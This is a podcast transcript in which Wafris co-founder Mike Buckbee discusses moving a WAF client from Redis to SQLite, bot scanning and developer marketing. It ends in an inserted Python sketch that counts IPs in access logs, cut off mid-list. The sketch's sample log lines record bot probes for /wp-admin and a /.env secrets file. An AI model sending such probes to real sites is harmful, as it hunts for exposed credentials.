Software Huddle - Blocking Bots & Moving from Redis to SQLite with Mike Buckbee

Episode Date: October 1, 2024

Today, we have Mike Buckbee on the show. Mike is the co-founder of Wafris, and he wrote a really insightful article last week about moving from Redis to SQLite for an aspect of their architecture. The article was nuanced in describing why it worked for their specific needs, and it has some surprising takeaways, including that SQLite was 3x faster than a local Redis instance for their workload. Mike has built a few different WAF (Web Application Firewall) products, so we covered that area as well. He's seen a lot here, so we walked through all the nefarious traffic patterns and the speed at which these bots adapt to new vulnerabilities. Finally, Mike has a wide-ranging skillset that includes marketing. Developers are notoriously tricky to market to, so we talked about his experience in effective marketing to developers without being disingenuous.

Links
Blog Post: https://wafris.org/blog/rearchitecting-for-sqlite
For A Good Strftime: www.foragoodstrftime.com
IP Lookup: wafris.org/ip-lookup

Timestamps
01:11 Start
03:41 Wafris
07:22 Redis and SQLite
19:09 Flatfile
21:50 Knowatoa
28:22 Web Application Firewalls
46:21 Jumpstart Pro
48:11 Marketing to Developers

Transcript
Starting point is 00:00:00 I think it's a misnomer that developers don't care about security. Like, I hear that a lot from security teams, which is the security team being frustrated that, like, hey, I'm trying to get these developers to fix this thing. And they're coming back that, like, is that really an exploit? I tried to do this thing. It's not fun stuff to work on. And I think their takeaway is that developers don't care about this. I think developers care a lot about the security because I think they're conscientious. And part of making good software is making software that
Starting point is 00:00:29 doesn't harm your users. How sophisticated are, I guess, the bad actors? Is it pretty sophisticated stuff, or what's that look like? For sure, there's stupid bots out there that do, like, /wp-admin to every Rails site and just, you know... I've seen those, for sure. Yeah, yeah, for sure. Well, and that's because there's a lot of that out there. But those bots, there's still enough intelligence to them, because they're trying to be efficient. Like, imagine you were writing a malicious bot: well, I'll check for the most common thing, but whatever the headers come back with, then I can do a follow-up too. I want to talk a little bit about web application firewalls generally,
Starting point is 00:01:05 because you have some deep expertise in this area. And I guess, how did you get interested in this idea? Hey, folks, this is Alex. And today we have Mike Buckbee on the show. He's the co-founder of a couple of companies, including Wafris. And he wrote this really cool article this week that I saw about how they re-architected and moved from Redis to SQLite in how they do Wafris for client installations. And I just thought it was really interesting how he laid it out. Like, hey, some of their unique requirements,
Starting point is 00:01:29 some of the testing they did, why they did it. And I just love posts like that. We got to talking and decided, hey, let's make an episode about that. So we talked about that re-architecting. We also just talked about WAFs in general because he's got some pretty deep expertise in this stuff. So just like what that looks like,
Starting point is 00:01:43 what some of these problems are and how you should be protecting your stuff. We also just talked about Rails and marketing to developers, a lot of good stuff. In this episode, I really liked talking with Mike. If you want to reach out and you know, with suggestions or comments or guests you want to have on the show, anything like that, feel free to reach out to me or Sean. With that, let's get to the show. Mike, welcome to the show. Hey, thanks so much, Alex. It's great to be here. Yeah, sure. Well, I found a post you wrote earlier this week, and it was like one of my
Starting point is 00:02:11 favorite posts that I read this year. I thought it was really great. And we just started getting to chatting and thought it'd be good to have you on the show. I want to talk about that post and a lot of other things you're working on. You're the co-founder of Wafris, but maybe for people that don't know, you can give us a little bit of background on you and Wafris. Oh, sure. Yeah. So I'm a software developer and founder and have really straddled the line between a lot of marketing activities and software development and worked for lots of different companies. I've worked for some YC startups. I've worked for like some really big companies. I've worked for the U S Navy. Um, so pretty much the whole gamut of things.
Starting point is 00:02:50 Uh, and you know, through that, you know, hopefully have learned, you know, to do better and better at this. And, uh, something I'm very big about is actually trying to put things out there instead of just like trying to do a side project and it kind of languishes, but to actually like hit publish on it, put a domain on it and let it live out there. And so I've tried to do that for a number of years and to try to, the phrase I like is like stacking bricks. So I've got a whole lot of different things, but, you know, I'm stacking all these bricks to try to build something bigger. And yeah, that's where I'm at today. Yep. Very cool. Yeah, it makes sense
Starting point is 00:03:25 that you have, like, a bit of the marketing background along with the development, just, like, how well done this post was, I think, and, like, a few other pieces of content that you have on the Wafris site. And then you shared some, like, side projects as marketing that you've done. So yeah, a lot of cool stuff with that that I want to talk about. But I want to start with this post, because this sort of kicked it all off. So this post is re-architecting Redis to SQLite. And like it says, you're talking about migrating a portion of your architecture from Redis to SQLite. Some interesting stuff I want to get into, but I guess my favorite part of it is you're just laying out your requirements, which were somewhat idiosyncratic compared to like other application requirements, describing those, like why they were important, how they affected the final solution,
Starting point is 00:04:08 and like why that resulted where you went. I guess maybe tell us about Wafris and how it works. And then just like, we'll go into like your general constraints or needs around this part of your application. Sure. So Wafris really comes about, you know, I think like a lot of stuff, from my own personal frustrations. And there's really two angles on that. One, I run a very enterprise web application firewall that lives in the Heroku ecosystem called Expedited WAF. And it is a classic sort of firewall where it's for enterprise customers. It starts at quite a high price point.
Starting point is 00:04:43 It's a little tricky to manage, though we've done as much as we can with that to make it easier. But it's certainly not the default. And that's what we see is everybody gets hit. It's indiscriminate. And literally, it's to the point where bots that are scanning for vulnerabilities, they don't really go out and pluck out like your site or my site. What they do is they hit every IP address in an address space. They hit every single website on this giant list. So there's a real need for default security that's not present. And the other piece is what comes up from the open source world is lots and
Starting point is 00:05:19 lots of great things as far as like individual libraries, but it's not really a system. And so we're trying to have a different take on this. So Wafris is in the case of like a web framework, like Laravel, Rails or Express, it's a middleware, you put it into your application, and then you have a whole range of tools that you can use to stop attacks, you can block by user agents. And this is one of the things that if we were starting today as like a profession, we'd say, hey, you know what? We can all look in our logs and find all of these crazy IP addresses doing horrible, stupid things. So obviously it's got to be easy to just like one click block this IP address from doing that. Oh no, no, that's a whole
Starting point is 00:06:04 other thing. And so in most cases to do that, you have to actually like hard code something into the application, push it out, do a deploy. And as soon as you do that, there's 10 more IP addresses that have come in that are doing something else. So most people give up and they have poor security.
Starting point is 00:06:19 So that's the other angle. So we're trying to make it more of a default, have an open source solution so it can be widely deployed, and make something that works in lots of different environments. I mentioned web frameworks, but also like ingress controllers, like Traefik, HTTP servers, like Nginx and Caddy. So it has this very broad sort of set of requirements and a very deployed, it's not an internal SaaS in that respect. Does that make sense? Yeah, I think so.
Starting point is 00:06:52 And so as I understand it, you have hook-ins to these different web frameworks and things like that. And with that, they can sort of call out to something to figure out, hey, should this request be blocked or not? Yeah. The easiest thing to think about is an IP address that, hey, this request is coming from a certain IP address. Is it something we should block? And just there's a lot of other things in there, but that's the easiest.
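To make the middleware idea concrete, here is a minimal sketch in Python rather than Ruby, assuming a plain WSGI application. The class name `BlockListMiddleware`, the helper `status_for`, and the in-memory set of blocked addresses are all hypothetical and are not taken from Wafris; the point is only that the allow-or-block decision sits in front of the application on every request.

```python
from wsgiref.util import setup_testing_defaults


class BlockListMiddleware:
    """Hypothetical WSGI middleware that rejects requests from blocked IPs."""

    def __init__(self, app, blocked_ips):
        self.app = app
        self.blocked_ips = set(blocked_ips)  # assumption: small in-memory list

    def __call__(self, environ, start_response):
        client_ip = environ.get("REMOTE_ADDR", "")
        if client_ip in self.blocked_ips:
            # Short-circuit before the wrapped application ever runs.
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"Forbidden\n"]
        return self.app(environ, start_response)


def hello_app(environ, start_response):
    """Stand-in for the real web application."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"Hello\n"]


def status_for(app, ip):
    """Send a fake request from `ip` through `app` and return the status line."""
    environ = {}
    setup_testing_defaults(environ)
    environ["REMOTE_ADDR"] = ip
    seen = []
    body = app(environ, lambda status, headers: seen.append(status))
    list(body)  # drain the response body
    return seen[0]


protected = BlockListMiddleware(hello_app, ["203.0.113.7"])
print(status_for(protected, "203.0.113.7"))
print(status_for(protected, "198.51.100.1"))
```

A real deployment would need to handle proxies (for example, forwarded-for headers) and much larger lists, which is where the storage question discussed in the rest of the episode comes in.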
Starting point is 00:07:20 You know, is this on a block list? Yep. Yep. Gotcha. Okay. So diving in a little bit just in terms of how it works. If I'm a Rails developer, I sign up for Wafris and do this. I integrate this middleware into my system. A request comes into my Rails application. Where is that thing that it's going out to on the hot path to figure out, hey, should this request be allowed?
Starting point is 00:07:40 Just get a sense of how that's working. Yeah, so this article was about moving from Redis to SQLite for the clients. So in Rails, and again, this works the same in all the frameworks, in v1 of this, which was a mistake, we had chosen to base it on Redis. And our assumption was like, oh, well, you're setting up your web stack, you have, you know, a relational database, you probably have Redis sitting there, so just use Redis and it's right there and handy. That was an assumption that was wrong, you know, just flatly. And just to be clear on this, so, like, even though I'm using Wafris in some sense as a service from you all, it's actually, like, on my own Redis
Starting point is 00:08:22 infrastructure somewhere, like within my application. Yes. Yeah. A model, I don't know if you're familiar with Sidekiq, which is the async job processor. That was really our model. We're like, oh, what if we made like a Sidekiq, but for web application firewalls? And the performance characteristics of Sidekiq, and again, this is not in any way a knock on Sidekiq. It's just it's a different
Starting point is 00:08:45 thing. It can be less because it's not in the hot path and deliberately so. So if you have a Redis that actually takes like a hundred milliseconds to respond because it's across the network, that doesn't matter so much because it's just enqueuing jobs that get taken care of and come back. When that's like, Hey, should we show the homepage to this bot or not? That falls apart. Um, and so we had done a tremendous amount to really make Redis fast. I don't know if you're aware of this, but there's a whole, like, Lua scripting language you can run inside of Redis. And so we had this whole system that did this in it. From a technical standpoint, it was really cool.
Starting point is 00:09:25 And from throughput standpoint, it was really great. But altogether, it failed. And it was very difficult to set up Redis for our customers. And you really needed to go in and tweak some internals and do some stuff. And it was just a pain. It was just a huge stumbling block. So that was version one. So version two is basically if you just add the gem and you're set, it's a whole other experience.
Starting point is 00:09:54 And what enabled us to do that was we had switched from Redis over to SQLite. And I don't know if there's other parts of, I don't know if there were specific things you want to talk about in there, Alex, but yeah. Yeah, for sure. I mean, I think, I think like, just thinking about some of the very unique requirements there of like, hey, this is, you know, deployed to a customer and given directly to them. So it's not like they're calling out to you and it's like, hey, what do we use in our stack behind our API of like Redis or SQLite? It's like, no, actually, this is getting pushed out to a customer. And so we need like, one of the major factors there, as I understand it, is just like ease of setup for them and just operational ease, right on on some of that stuff. You know, I mentioned earlier, you know, I try to like, put things actually out there for people to
Starting point is 00:10:39 use and get feedback on and do stuff. And when and it's so hard to do that. Like you always want to work on stuff more before you show it to people. But one of the things we really found when we put this out there was that there's more and more distributed systems out there. Like even in somewhat monolithic applications. And so we're a partner with fly.io. Like we're working on web application firewalls for them.
Starting point is 00:11:05 They were the first ones to get the V2 of the rails. So they have from their DNA, a very distributed system. So when you deploy to fly, it's awesome because you can spread out and be on all these different regions and do all this different stuff. What you can't have is a single monolithic Redis that works across the Argentina region and the Tokyo region, as well as U.S. East, you know, U.S. East in quotes, all at the same time and have it be performant. And so in a lot of ways, this was specifically designed to work in those kinds of environments where instead of there being like one Redis server that all these different applications all come up to, it pulls down the individual SQLite databases to all of them.
Starting point is 00:11:50 And so we built a sync architecture to make that happen. And it works so much faster. Yep, yep. And I think that's another interesting point. You're like, hey, Redis wasn't great for me because I'm distributed. And it's like, a lot of people would be like, wait, so you went to SQLite,
Starting point is 00:12:03 which is like basically a single file somewhere. And that would be kind of weird, but again, like, unique requirements there: writes are pretty infrequent, like, updates around rules and things like that are pretty infrequent and, like, not super time sensitive, right? So when they do happen, you're actually just, like, taking that whole SQLite file and distributing it to all these different locations. And every, you know, app server essentially has that file locally. And it's not calling out to some remote service. That's exactly it. Yeah.
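The "ship the whole file" pattern described here can be sketched in a few lines of Python. This is an illustration under assumptions, not Wafris's actual sync code: the table name `blocked`, the function names, and the idea of writing the new file next to the live one and swapping it in with `os.replace` are all choices made for the example. In practice the new file would be downloaded from a server rather than built locally.

```python
import os
import sqlite3
import tempfile


def build_rules_db(path, blocked_ips):
    """Write a fresh rules file (stands in for a file published by a server)."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE blocked (ip TEXT PRIMARY KEY)")
    conn.executemany("INSERT INTO blocked VALUES (?)", [(ip,) for ip in blocked_ips])
    conn.commit()
    conn.close()


def install_rules_db(new_path, live_path):
    """Swap the new file into place in one step.

    os.replace is atomic when both paths are on the same filesystem, so a
    reader opens either the old file or the new one, never a partial write.
    """
    os.replace(new_path, live_path)


def is_blocked(live_path, ip):
    """Open the local file per lookup; no network call is involved."""
    conn = sqlite3.connect(live_path)
    try:
        row = conn.execute("SELECT 1 FROM blocked WHERE ip = ?", (ip,)).fetchone()
        return row is not None
    finally:
        conn.close()


workdir = tempfile.mkdtemp()
live = os.path.join(workdir, "rules.db")

# First version of the rules arrives and is installed.
incoming = os.path.join(workdir, "rules.db.incoming")
build_rules_db(incoming, ["203.0.113.7"])
install_rules_db(incoming, live)
print(is_blocked(live, "203.0.113.7"))
```

Because rule updates are infrequent and not time sensitive, each app server can repeat this download-and-swap on its own schedule without coordinating with the others.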
Starting point is 00:12:34 Well, and so what's interesting to me, and this is a lot of what I try to get across in the article, is I think what's changed in the last, you know, five, ten years of web development is, like, what is hard and what is easy. Like, it's actually easy to distribute 100 megabyte SQLite database files. And it seems weird in the context of web applications, but every mobile app you use silently does this all the time. You know, my son plays Cookie Run: Kingdom, which is this incredibly complicated game of like candy real-time strategy, social thing. Anyway, you know, the whole thing is a SQLite database that it downloads of like, here's the king of the cookies, you know, and he has 20 hit points, like all of that stuff. So it's just a standard in the mobile application world that, you know, we've just not picked up on the web side. So, yep. Yep. So I think that's super interesting. And, like, one thing when I started to read
Starting point is 00:13:32 it and saw, hey, you know, SQLite was three times faster, I'm like, okay, that kind of makes sense, because it's not making a network call out to Redis and all that stuff. But then, as I reread it, that test was even with a local Redis. So it's not even, you know, some network hop to a different database, which kind of surprised me a little bit. I guess, like, I have a few hypotheses. Do you have any hypotheses, like, what are your thoughts on why local SQLite beat local Redis without even the network hop aspects there? Well, I think, first off, let's not discount: maybe I did something really bad in the benchmarking. Like honestly, no, no, it's, it's true. Like, yeah. Like you
Starting point is 00:14:11 mentioned in the thing is like benchmarking is really hard because you have to like be expert in sort of everything you're benchmarking or else you're not, it's hard, but yeah. Anyway, go ahead. Yeah. Well, and that's sort of the starting point of it is that like, if, if I, as the person who's worked extensively with Redis is writing these incredibly complicated Lua scripts in it, we had an official partnership with Redis as well, like signed, you know, partnership with Redis. If, if we can't get this Redis to be correct in a reasonable way, what hope do our users have? So that's part of it. So that's part of it. I think from a technical standpoint, and there is a really big Hacker News discussion about this. And in there, a lot of people with, I think, even more knowledge than I really came to the conclusion that what's happening is that the Redis connections are still over sockets.
Starting point is 00:15:07 So it's like serializing, deserializing this into Redis's protocol to do the queries. And what I was testing, like, so a little bit of background. So the big thing that we have to deal with, like the worst, most, most pathological thing we have to deal with is really trying to figure out if an IP address is in a range. And so I don't know if you've worked with IP address as much, you know, not enough. So you'll have to educate me here for sure. So here's, here's the two challenges. There's two sets of IP addresses. There's IPv4 and IPv6. Fair enough. And the naive way to handle this and the way we started was, okay, well, this is great. We'll take the IP addresses and we'll take them and we'll take the range and we'll split it into integers.
Starting point is 00:16:00 And then we'll see if it's between these two integers. There's a bunch of inherent issues with that with IPv4, but they can be dealt with. But let's look at IPv6, which is much bigger. And then the integer you get back is bigger than a bigint. And so that's a problem. And what you find out when you really dig into this, if you look at like the IP lookup, the IP handling libraries and all this, it's really like a kludged together set of like optimized regexes and like heuristics for pulling apart the IPs into this different stuff. So originally in Redis, what we did was we used a sorted set, which is usually used for leaderboards.
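The size problem with IPv6 is easy to see with Python's standard `ipaddress` module. The sketch below is only an illustration: the helper names are made up, and the 39-digit zero-padded key is one way to make string order match numeric order (39 is the number of decimal digits in 2^128 - 1), not necessarily the exact encoding Wafris uses.

```python
import ipaddress

MAX_SIGNED_64 = 2**63 - 1  # largest value a signed 64-bit "bigint" column can hold


def ip_to_int(ip):
    """Convert an IPv4 or IPv6 address string to its integer value."""
    return int(ipaddress.ip_address(ip))


def ip_to_padded_key(ip):
    """Fixed-width, zero-padded decimal string for an address.

    Because every key has the same width, comparing keys as strings gives
    the same answer as comparing the underlying integers.
    """
    return str(ip_to_int(ip)).zfill(39)


print(ip_to_int("192.0.2.1"))                      # fits easily in 64 bits
print(ip_to_int("2001:db8::1") > MAX_SIGNED_64)    # IPv6 does not
print(ip_to_padded_key("10.0.0.2") < ip_to_padded_key("10.0.0.10"))
```

One caveat of this simple encoding: an IPv4 address and a small IPv6 address can map to the same integer, so a real system would need to keep the two families apart, for example with separate tables or a prefix.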
Starting point is 00:16:42 So you have like a key and then you have a value and the value has a number. And as that number changes in increments, it automatically reorders it. So you can have millions and millions of people in this and it's very easy to take out a slice. And it's like, oh, well, Alex, you're 500th. And so here's the next 50, that kind of thing.
Starting point is 00:17:01 If you take that sorted set and make everything the same score, it then reverts to doing what's called a lexical index, which is basically just like alphabetizing it. So we take the IP addresses, make them into integers, zero pad them, and then add, like, a dash and, like, a number to them that indicates like, oh, this is the country. So Argentina is like a one. And so we'd have a range that's two entries in that sorted set and then do a range and a reverse range on the same number. So it's really like two queries for that IP address. And then if those rule numbers, that's the suffix on it, are the same, we know it's in that range. Otherwise it's not. It's not even real simple to explain. And a lot of people were
Starting point is 00:17:54 speculating on better ways to do it with like bit fields and stuff. I would love if there was a better way. I tried so many things. I've had so many people like nerd snipe me over this. So anyway, so we implement that in Redis and we implemented the same thing in SQLite because we couldn't still figure out a better way to do it. And so SQLite is just faster for this weird query. So yeah, yeah. Those are going to be my two guesses. Like, hey, you still have some network serialization, deserialization, even for local Redis. And then, like, Redis has some great data structures, but not the perfect data structure for this.
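Here is a rough reconstruction of the two-query range lookup in SQLite, written in Python. It is a sketch of the idea as described in the conversation, not Wafris's schema: the table `bounds`, the column names, and the functions are hypothetical, and it assumes ranges do not overlap and that each range has its own id (if several ranges shared one id, an address in the gap between them would match incorrectly). Each range is stored as two rows, one for its first address and one for its last, and an address is inside a range when the nearest boundary at or below it and the nearest boundary at or above it carry the same id.

```python
import ipaddress
import sqlite3


def key(ip):
    """Zero-padded decimal key so that string order matches numeric order."""
    return str(int(ipaddress.ip_address(ip))).zfill(39)


def build_db(ranges):
    """ranges: iterable of (range_id, first_ip, last_ip), assumed non-overlapping."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bounds (ip_key TEXT NOT NULL, range_id INTEGER NOT NULL)")
    conn.execute("CREATE INDEX bounds_ip_key ON bounds (ip_key)")  # B-tree index
    for range_id, first_ip, last_ip in ranges:
        conn.executemany(
            "INSERT INTO bounds VALUES (?, ?)",
            [(key(first_ip), range_id), (key(last_ip), range_id)],
        )
    conn.commit()
    return conn


def find_range(conn, ip):
    """Return the id of the range containing `ip`, or None."""
    k = key(ip)
    below = conn.execute(
        "SELECT range_id FROM bounds WHERE ip_key <= ? ORDER BY ip_key DESC LIMIT 1",
        (k,),
    ).fetchone()
    above = conn.execute(
        "SELECT range_id FROM bounds WHERE ip_key >= ? ORDER BY ip_key ASC LIMIT 1",
        (k,),
    ).fetchone()
    if below and above and below[0] == above[0]:
        return below[0]
    return None


conn = build_db([(1, "10.0.0.0", "10.0.0.255"), (2, "192.0.2.0", "192.0.2.127")])
print(find_range(conn, "10.0.0.42"))
print(find_range(conn, "10.0.1.0"))
```

Both queries are index seeks followed by a single step, which is the kind of access pattern a B-tree handles well and may be part of why SQLite did well on this workload.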
Starting point is 00:18:30 And just reading some of your responses in that Hacker News post about how you, yeah, use a sorted set with zero value. Like, I was like, oh, I wonder how a sorted set works there with just a giant blob of all the same scores and things like that. Whereas, like, this is like a perfect B-tree application in SQLite for that sort of thing. So yeah, that was, like, super interesting. But I think, again, just going back to thinking about your specific needs: hey, you had, like, kind of this weird access pattern. It's a little tricky for Redis. Also, like, you know, needing to make it easy for your clients, being able to distribute it sort of asynchronously, and updates and things like that just make it a nice fit for SQLite. So I thought that was super fun.
Starting point is 00:19:10 Some people I know like ask like, hey, why didn't you just use a flat file? Do you think about that at all? Oh, yeah. So I mentioned like, oh, here's all the stuff we're doing. So we have to maintain different lists of that. And the big ones are we have to maintain both a GeoIP database that, you know, you imagine that's huge, that's millions of records. And then we also have through a whole mix of sources, because we run this other enterprise WAF, an IP reputation database, that's also millions of
Starting point is 00:19:41 records. So, so if you imagine a JSON file, you know, or whatever kind of flat file, well, with millions of records in it, well, now you have to build an index on it and then sort of now you've built SQLite. So we give up on that pretty quick. Yeah. It's like people are like,
Starting point is 00:20:00 why not a flat file? And it's like, well, SQLite almost is a flat file. Plus they've got a bunch of nice stuff on top of like, why would I recreate compression and indexes and whatever they're all doing there? This isn't, this isn't me. I know there's been a couple of attempts,
Starting point is 00:20:11 like for people that are doing stuff where they want to have like, um, like for Figma or design applications. And they'll use SQLite as the data format for like the export and stuff. Like, it's just such a cool little database for stuff like that. Yeah, for sure. Just a side note on Redis: there's a note you mentioned in there about being at Rails World 2023 and feeling like some blood in the water about Redis. Is that about the license change? Is that about just, like, I think more
Starting point is 00:20:41 vibes towards running simpler architecture or like what, what was that about? So I think it's a mix of things and it's interesting. So I was just at Laracon, um, first Laravel conference I'd been to, and was at Rails World, and Rails World is happening now, um, for 2024. And there's a real divergence where, you know, DHH and the Rails world is like, you should run it yourself. And I think, you know, if that's your goal, what you want to do is strip out all the complexity, and the same way we did with, like, yeah, you can get rid of Redis, use SQLite, it's a lot simpler. And
Starting point is 00:21:14 that's sort of where they were going as well, I think, which is trying for a simpler architecture. They just got rid of Traefik as an ingress controller and have Kamal Proxy now. So it's a simplification of it, and SQLite, I think, really fits with that story well. Yep, yep. Interesting. We were talking a little bit before we started. Like, one thing I love about the post is it felt like it was written by a human. It didn't feel like something that AI could create. It had some life and just a little bit of soul to it. I feel like I can feel your personality coming across, which is great. You mentioned another project you're working on, Knowatoa.
Starting point is 00:21:53 Tell me about that. Yeah. So, you know, in general, I'm a man of many side projects. And the side projects spawn side projects and things. So this actually came out of a discussion I was having with some other SaaS owners, which is everywhere you look, you know, like, especially developers, I don't know about you personally, but the rise of AI tooling for development has absolutely murdered the number of Google searches I do in any given week, like just massively. And what does that mean
Starting point is 00:22:28 for people finding my SaaS, you know, in these. So if you go into ChatGPT and you look for like, what's Wafris, like, does it have the right information? Does it do all this? And so I had started with literally a, it was a Ruby script that started going through the APIs and would like look for these sorts of things and then spit out a CSV. Then I had like a half dozen other like SaaS owners and SEO people. And I would like every week I would send them this CSV, like, Oh, hey, I reran the numbers on this new model and just got a little bit of traction and interest, um, from that. And then I started reaching out to a few like SEO agency people and they're like, oh, this is great. Not because there's a huge amount of volume of this.
Starting point is 00:23:12 And it's really tricky to see because it doesn't have attribution, but they really wanted to, it's something that's real. Like, I think that's the bottom line is there is definitely more people looking in these systems than, than we know. And so Knowatoa is now a SaaS that lets you go to, you can go to the site and put in your domain and it will figure out your competitors and it will figure out like, Oh, here's looking at all the actual keywords for your site. Like it pulls like a thousand keywords for your site. Then it says like, well, a lot of these are informational. Like, hey, what's a proxy server?
Starting point is 00:23:51 What's an XYZ? AI will just answer that. So we're not even going to worry about those. And we're just going to focus on these like high intent questions. Like what's the best XYZ in Dallas? You know, that kind of stuff. And then it gives them, and then it does all the math and gives you a nice report of all that information. I'm like, oh, well, this is doing better here. Your competitors showing up better here. And we're still working on this, but internally I'm tracking
Starting point is 00:24:14 a lot of like data source stuff and a lot of tying back to the security. A lot of the things for optimization mirror, a lot of the things you would do with LLM security, like trying to figure out data sources and trying to sort out which bots are hitting my site. Like, can all the AI bots scrape my site? Like, is that good or bad? You know, all those sort of different things. Yep. Interesting. Have you seen, you know, tracking this over time, have you seen big differences in how like Wafris, for example, is showing up in in these different like as the models upgrade and update their information and things like that?
Starting point is 00:24:50 Oh, yeah, absolutely. I mean, I think a misconception and this is also this is how I learn about stuff like, you know, Wafris. There's a lot of things that are maybe AI tangential, but not really AI straightforward. And it seems like such a big thing. How do I learn about it? I do side projects, you know. So something I came to realize is we talk about these models like GPT-4, and I think we think of that as like a block, but it's not. And they're constantly tweaking and changing things behind the scenes and if you
Starting point is 00:25:26 want, they actually have, like, if you're using the API, they actually have a model that's just called, like, GPT-4 latest. You just call that and you get whatever you want. And that kind of makes sense. Like, occasionally, I don't know if you remember, there was like a couple days where ChatGPT was like a crazy uncle, like no matter what you put in, it just came back with like insanity. And then they're like, Oh no, no, no, we reverted that. We fixed that. So there's a lot of that happening. And yeah, I think it's, it's really hard to know right now. Like it's just hard to know, like, is the information in there correct about my company? Is it doing this? And like I mentioned, I had talked to a bunch of SaaS founders,
Starting point is 00:26:10 pretty much at this point, all of them have said, yeah, I talked to someone who said they found me in ChatGPT. And the pattern is they do research in the LLMs and then they do a navigational query in Google. So they look up, hey, what's the best transcription software for this? And it comes with a bunch of names like great. And they put that name in and they go to the website. But yeah. whether through reference or through other ones that you're tracking, I guess like see some marketing of strategies or things like that in non LLM world, whether it's SEO or new posts and things like that and see like,
Starting point is 00:26:53 Oh, now there's a lift in them getting mentioned in some of these queries in LLMs. Like, what is the best web application thing for Rails, or something like that? Is there stuff you can do in the non-AI world that's having an impact there? Is that too hard to track? Oh yeah. Well, so a way to track that is, and it's, you know, I think it makes sense, which is you can look at the difference between what's in the search results page and what's in the results that come back from the LLM. So you can see, oh,
Starting point is 00:27:22 there's some new and this is an opportunity. It's an opportunity. Like if you're in a really competitive space, it's hard to break in on the SEO side. Maybe this is a chance to break in on the, I call them AI search services because they're kind of blurry on the AI search service side. And definitely like some of the folks who have been much more active on Reddit, much more active on like forums and things like that. And I think another piece of this is, if there's a piece of advice, LLMs are very straightforward, I think, compared to the traditional search. So if you don't have something that says like, yes, Wafris is the best web application firewall, the LLM won't know that you're the best application firewall.
Starting point is 00:28:10 So, because a lot of that, especially in the business world, like, you're almost trying to imply all these things. Yeah. They aren't real subtle. So, yeah. Yep, that's interesting. I want to talk a little bit about web application firewalls generally, because you have some deep expertise in this development, cybersecurity work, and marketing. Like those are the three sort of things. And so I've done a lot of different permutations of all of those things. So. And was one of those first, like, did you start as one and start to like add more skills on or like, or were you just like, Hey, just broad indie hacker from childhood?
Starting point is 00:29:02 Yeah, certainly I started as um a software developer you know learned web development and then just by the nature of the clients i had which was a lot of education and uh my background like when i was originally doing corporate stuff really came in working for the navy working for hospitals working for like 3M health information services, like very regulated environments, very, you know, kind of different things. So yeah. So like at the Navy, I had developed a rails app that helped with Navy personnel when they're leaving the service, they have to get like a comprehensive list of all of the injuries and health issues that they've had. And this is a huge pain for the doctors to generate this because it's just paperwork,
Starting point is 00:29:50 but it has a huge impact on the lives of those people because if they don't have everything listed, then they don't get benefits and they don't get supported post Navy. And so I wrote the system that like extracted and put all this together in a real like early form. And it was great for that. You know, it was like a real positive. But, you know, it has to exist in this very secure environment. It has to meet all these things. So a lot of this came out of that.
Starting point is 00:30:16 I had, so early in Heroku's lifespan, they came out with the platform API. And while it was still in beta, I had noticed that they had a method of programmatically applying SSL certificates. And so this is way before Let's Encrypt stuff. So that was really my first big win, was I developed a system for automatically producing those and installing them and getting it to work. And so I still run half a dozen add-ons in the Heroku marketplace. And then the biggest of those is Expedited Web Application Firewall, which really came out because Let's Encrypt came out and was a much better solution, both, you know, from a cost standpoint as well as like a user experience standpoint.
Starting point is 00:31:03 And I think maybe I took those lessons to heart with the web application firewall pieces. So yeah. Interesting. Okay. So I guess like maybe even just educate me on WAF generally, I guess like how bad is this problem? Why is it,
Starting point is 00:31:17 why is it needed so bad? Is there, they're just like bot armies out there just scanning all sorts of, you know, like you're saying IP addresses and web addresses and everything. Yeah. I think there's, there's an external and an internal reason for it. Most of the people that I talked to really fall into three buckets.
Starting point is 00:31:32 One, they're trying to get like SOC compliant or some other compliant thing, and they need a web application firewall sort of for a checklist. And those people are very reluctant customers. But I've found that oftentimes they become a lot more enthusiastic after it's installed and they're actually using it. Because really all a WAF is is a toolbox. And I think as developers, we love our tools. We love like adding in new libraries and doing all this stuff. And so that's the one group is people trying to get compliant.
Starting point is 00:32:01 The other group is, I'm a small, uh, SaaS, and I'm trying to interact with this bank. I'm trying to interact with this bigger company where I just got acquired and they looked at what we're doing and then freaked out and said, like, you need to get a WAF immediately because you don't even know if you're under attack. And the third group is just, oh boy, we looked in our logs and saw a lot of weird traffic. And again, it's mostly bots. So I had a company that was an HR, like if you have an incident inside the company, you can anonymously report it to this external SaaS. And they sort of handled the complaints and things.
Starting point is 00:32:39 And they found out a third of their traffic, of the number of requests to their website, was from China. They only do business in the U.S. And it's not even to say like, this is a malicious Chinese cyber attack that was targeting them. No, it's just these bots that are launched from China. Some of them are like even search engine bots and all these things, but all it takes is like a little misconfiguration for like all that data to be out there. Yeah. Yep. Interesting. And so are these mostly, I guess when people sign up for a WAF, is that almost always about blocking traffic that's not true valid traffic? Like, you know, maybe they're making some sort of developer tool and they need to have like some actual rate limits on people that are hitting their API in like a programmatic way that could
Starting point is 00:33:29 shut down their application. Like, is there much uses of that? Or is it mostly like, hey, you know, just like truly invalid traffic that we don't want to have happening? It's truly invalid traffic. I mean, it's not a good solution for doing API based rate limiting. It's a much better solution for doing things like, well, again, I mentioned it's like a toolbox. And so the toolbox is we, and especially with Wafris, we've really tried to collapse the loop of all this stuff where you can certainly look in your logs.
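Editor's sketch: the "look in your logs" step, finding out whether one IP address accounts for most of your traffic, can be approximated in a few lines of Python. This is not how Wafris implements its visualizer; it is a minimal illustration that assumes access-log lines where the client IP is the first whitespace-separated field (as in the common Apache/nginx log format). The function name `top_ips` and the sample data are hypothetical.

```python
from collections import Counter


def top_ips(log_lines, n=10):
    """Return (ip, hits, share_of_requests) for the n busiest client IPs.

    Assumption: the client IP is the first whitespace-separated field
    of each log line.
    """
    counts = Counter()
    for line in log_lines:
        parts = line.split()
        if parts:  # skip blank lines
            counts[parts[0]] += 1
    total = sum(counts.values())
    return [(ip, hits, hits / total) for ip, hits in counts.most_common(n)]


# Made-up sample lines using documentation-only IP ranges.
sample = [
    '203.0.113.7 - - [01/Oct/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Oct/2024:10:00:01 +0000] "GET /wp-admin HTTP/1.1" 404 0',
    '203.0.113.7 - - [01/Oct/2024:10:00:02 +0000] "GET /.env HTTP/1.1" 404 0',
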